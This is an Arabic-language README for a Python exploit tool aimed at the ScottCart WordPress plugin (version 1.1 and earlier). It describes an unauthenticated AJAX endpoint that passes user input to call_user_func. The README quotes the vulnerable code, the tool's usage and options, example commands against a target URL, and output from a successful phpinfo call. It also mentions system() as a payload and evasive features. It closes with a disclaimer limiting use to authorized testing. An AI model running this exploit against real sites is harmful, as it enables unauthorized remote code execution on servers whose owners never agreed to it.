
ScottCart <= 1.1 - تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة
🔥 سكربت استغلال لـ ScottCart <= 1.1 - تنفيذ أكواد عن بُعد بدون مصادقة
🧑💻 بواسطة Nxploit – Khaled Alenazi
إضافة ScottCart لـ WordPress (الإصدارات ≤ 1.1) معرضة لثغرة تنفيذ الأكواد عن بُعد (RCE).
وهذا يسمح للمهاجمين غير المصادَقين بتنفيذ دوال PHP عشوائية على الخادم عبر نقطة نهاية AJAX ضعيفة.
يسجّل الإضافة إجراء AJAX غير محمي:
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
والذي ينفّذ:
call_user_func($_POST['function']);
مما يسمح للمهاجمين باستدعاء أي دالة PHP موجودة، مثل:
phpinfo()scottcart_get_the_user_ip()system() ← إذا تم توسيعها في بيئات معدّلةphpinfo() لإثبات المفهوم PoCresults_2025-03-26_14-33-01.txt)User-Agent مخصص، ومعالجة أخطاء، وتجاهل SSL للتمويهusage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.
options:
-h, --help Show this help message and exit
-u URL, --url URL Target base URL (e.g., http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Function to call (default: phpinfo)
phpinfo()):python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:
PHP Version => 8.1.12
...
📁 ويُحفظ في: results_2025-03-26_14-33-01.txt
هذه الأداة مخصّصة لأغراض التعليم والاختبار المصرّح به فقط.
لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.